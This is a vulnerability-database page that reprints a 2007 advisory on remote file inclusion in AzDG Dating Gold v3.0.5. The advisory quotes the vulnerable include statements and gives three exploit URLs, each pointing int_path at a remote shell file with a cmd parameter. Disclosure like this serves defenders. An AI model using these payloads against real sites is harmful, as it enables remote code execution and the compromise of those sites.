Lucene search
Basic search
Lucene search
Search by product
Subscribe
K
Start 30-day trial
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
SIGN IN
Securityvulns
SECURITYVULNS:DOC:17510
History
Jul 15, 2007 - 12:00 a.m.
AzDG Dating Gold v3.0.5 ===> Remote File Include Vulnerability
2007-07-15
00:00:00
vulners.com
302
JSON
+0+
N0Te:-I am N0t HaCkEr I aM ScRipTs ExplOit FiNder
++
___
_*_ScRipT NamE:-AzDG Dating Gold v3.0.5
_*_Download scRipt:-
http://www.ar-share.com/download2.php?a=29704
&b=32bf59e0268548cfdde4f79a44ed969c
(-_-)DisCoveRed By:- ThE dE@Th
(-_-)ConTaCt mE @:-h4cked.eg[at]
hotmail.com
(*)BuG In:- header.php
include_once $int_path."/classes/AzDG.template2.inc.php";
//include_once $int_path."/classes/AzDG.template3.inc.php";
(*)BuG In:- footer.php
include_once $int_path."/classes/AzDGOnlineUsers.class.inc.php";
(*)BuG In:-secure.admin.php
if (isset($l) && !is_dir($int_path.'/languages/'.$l) && $l != "")
{
include $int_path."/languages/default/default.admin.php";
include $int_path."/templates/header.php";
<#>Exploit:-www.sitename.x/scriptpath/templates/header.php?int_path=
http://shell.txt?cmd
<#>Exploit:-www.sitename.x/scriptpath/templates/footer.php?int_path=
http://shell.txt?cmd
<#>Exploit:-www.sitename.x/scriptpath/templates/secure.admin.php?int_path=
http://shell.txt?cmd
{*}All Greats 2 Asb-May Team,Arab Security Team,TiGeR
HaCkeR,ToOoFa,HaCk.eGy,ALk()mand()z,N04HaRD,BriGhTdArK
E x I t…
JSON